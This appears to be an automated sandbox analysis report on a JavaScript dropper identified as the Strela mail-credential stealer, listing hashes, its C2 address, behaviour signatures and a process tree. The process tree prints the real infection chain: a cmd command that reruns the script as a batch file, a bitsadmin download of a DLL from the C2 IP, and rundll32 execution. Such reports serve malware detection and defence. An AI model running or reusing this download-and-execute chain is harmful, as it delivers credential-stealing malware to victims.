Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2023, 10:32

General

  • Target

    DOC1757424612.js

  • Size

    13KB

  • MD5

    33458c29b7d7a22bbc960f09764c3af6

  • SHA1

    fb04c8b59ab580b33db4237960eba494c764d9a4

  • SHA256

    1e563b67998108406aa70d7a8df785dd314e8b4cb30ae3679bf7a915aeb9fd68

  • SHA512

    c195c21a4c5127546f79ac563f91ce4901c44ea35906e9d8867cabd357a6fd1e99e94ce3841ef40c380dfe36b078aa39257dba136f7f19459537dcc99ed4d1bf

  • SSDEEP

    384:jFs1d3r6ZJNlIbyq2k785UIro8KTMhSeObY0S9W1WU2:jFCd3r6/jIeq2g85UIrofMzOE0L1WT

Score
10/10

Malware Config

Extracted

Family

strela

C2

91.215.85.209

Signatures

  • Strela

    An info stealer targeting mail credentials first seen in late 2022.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\DOC1757424612.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\DOC1757424612.js" "C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat" && "C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer mydownloadjob /download /priority normal http://91.215.85.209/out.dll C:\Users\Admin\AppData\Local\Temp/kzorqwihln.dll
        3⤵
        • Download via BitsAdmin
        PID:3400
      • C:\Windows\system32\rundll32.exe
        rundll32 kzorqwihln.dll,h
        3⤵
          PID:2692

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat

            Filesize

            13KB

            MD5

            33458c29b7d7a22bbc960f09764c3af6

            SHA1

            fb04c8b59ab580b33db4237960eba494c764d9a4

            SHA256

            1e563b67998108406aa70d7a8df785dd314e8b4cb30ae3679bf7a915aeb9fd68

            SHA512

            c195c21a4c5127546f79ac563f91ce4901c44ea35906e9d8867cabd357a6fd1e99e94ce3841ef40c380dfe36b078aa39257dba136f7f19459537dcc99ed4d1bf

          • memory/2692-190-0x000000006D7C0000-0x000000006D858000-memory.dmp

            Filesize

            608KB

          • memory/2692-191-0x000002287C8C0000-0x000002287C8E1000-memory.dmp

            Filesize

            132KB